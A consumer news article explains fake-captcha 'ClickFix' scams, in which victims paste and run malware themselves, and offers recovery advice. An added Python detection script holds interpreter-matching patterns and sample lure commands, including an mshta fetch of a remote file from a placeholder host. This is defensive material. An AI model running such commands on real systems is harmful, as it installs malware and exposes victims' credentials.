Clicking a captcha "I am not a robot" box and identifying images to prove it is second nature for many internet users. Now, cybercriminals are exploiting people's comfort with the routine to scam them.
News outlets across the country are reporting on a new scam in which hackers use fake captchas to steal people's identity and financial information, accessing passwords to websites, cryptowallets and more.
As Security Boulevard reports, it's an insidious cybercrime because victims unwittingly type in commands to install the malware themselves (1). Once it's installed, cybercriminals have the keys to your computer and can even sell your information to others.
Here's how the fake captcha scam — also known as a ClickFix scam — plays out on both Windows (2) and Mac (3).
Tricking victims into installing malware themselves
It starts when you land on a website and get a "verify you are human" or other captcha prompt. It's what comes next that identifies the scam.
A message pops up saying the captcha system failed and that you need to run some commands to resolve the problem. First, you may be asked to click a "Fix It" or "How to Fix" button (the source of the scam's alternate name, "ClickFix"). Clicking it copies malware code onto your clipboard but doesn't install it.
Victims who click the "Fix" button then get instructions to key in a series of commands, and it's this step, carried out by the victims themselves, that installs the malware.
On Windows, victims may be asked to key in commands like this:
- Win + R (which opens up the Windows Run box)
- Ctrl + V (which pastes the malware code into the Run box)
- Enter (which starts running the malware)
On a Mac device, they may be asked to key in:
- Command + Space (which opens Spotlight)
- Type "Terminal"
- Press Enter (opening up Terminal, an interface in which code can be entered into the system)
- Command + V (which pastes the malware code into the Terminal)
- Return (which starts running the malware)
As WGAL TV revealed, because victims install the code themselves, antivirus systems don't necessarily pick up the malware as an intruder (4).
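Because the Windows variant runs through the Run box, the pasted command is left behind in the user's Run history (the per-user RunMRU registry key, whose values end in `\1`). The following is an added example, not part of the original article: a triage sketch that flags Run-history entries resembling a ClickFix paste. The heuristics, names and sample entries are assumptions constructed for illustration.

```python
import re

# Heuristics chosen for this example (assumptions, not a vendor rule set).
INTERPRETERS = re.compile(
    r"\b(powershell|pwsh|mshta|cmd|curl|wscript|cscript|msiexec)(\.exe)?\b", re.I)
REMOTE = re.compile(r"https?://|\\\\[\w.-]+\\", re.I)           # URL or UNC path
ENCODED = re.compile(r"-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I)
LURE_TEXT = re.compile(r"not a robot|captcha|verif(y|ication)|human", re.I)

def score_command(cmd: str) -> list[str]:
    """Return the traits that make one Run-box entry look like a ClickFix paste."""
    cmd = cmd.removesuffix("\\1").strip()    # drop the RunMRU value terminator
    reasons = []
    if INTERPRETERS.search(cmd):
        reasons.append("script-interpreter")
    if REMOTE.search(cmd):
        reasons.append("remote-source")
    if ENCODED.search(cmd):
        reasons.append("encoded-argument")
    if LURE_TEXT.search(cmd):                # decoy text meant for the victim's eyes
        reasons.append("captcha-lure-text")
    if len(cmd) > 200:                       # people rarely type this much into Run
        reasons.append("unusually-long")
    return reasons

def triage(history: list[str]) -> list[tuple[str, list[str]]]:
    """Flag entries that launch an interpreter and show at least one other trait."""
    flagged = []
    for entry in history:
        reasons = score_command(entry)
        if "script-interpreter" in reasons and len(reasons) >= 2:
            flagged.append((entry, reasons))
    return flagged

# Constructed sample history; the host name is a reserved placeholder.
SAMPLE_HISTORY = [
    "notepad\\1",
    "cmd\\1",
    "\\\\fileserver\\share\\1",
    'powershell -w hidden "<payload elided> https://lure.example.invalid/a"'
    " # I am not a robot - ID 0000\\1",
    "mshta https://lure.example.invalid/check.hta\\1",
]

if __name__ == "__main__":
    for entry, reasons in triage(SAMPLE_HISTORY):
        print(reasons, entry[:60])
```

A flagged entry is a reason to follow the response steps later in this article, not proof of infection on its own.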
How to protect yourself
Real captchas will never ask people to fix anything with keystrokes, so if a captcha prompt is followed by instructions to click a button to fix it, leave the page and return to a safe site immediately.
The Identity Theft Resource Center provides advice on what to do if you think you accidentally clicked a Fix button or proceeded with commands in a fake captcha scam (5):
- Disconnect from the internet immediately by turning off your Wi-Fi or unplugging your internet cable
- Move to a clean device to change passwords to important accounts
- If you've already installed a trusted antivirus program, scan your original device (while it's disconnected from the internet) for viruses
- If you haven't installed an antivirus program, take your compromised device to a professional for an antivirus scan
- Monitor your banking and credit card accounts for any unexpected transactions
The best protection, as always, is being alert and proactive — which includes installing trusted antivirus programs on your computer in the event it gets infected. You can also use multi-factor authentication on all your sensitive accounts so that even if hackers get access to your passwords, they can't necessarily access your accounts.
Article Sources
Security Boulevard (1); Microsoft (2); Bitdefender (3); WGAL TV (4); Identity Theft Resource Center (5).
Laura Boast is an Associate Editor with Moneywise.com and a lifelong content creator who has reached international audiences at Discovery, CBC, Blue Ant Media, Bond Brand Loyalty and more.
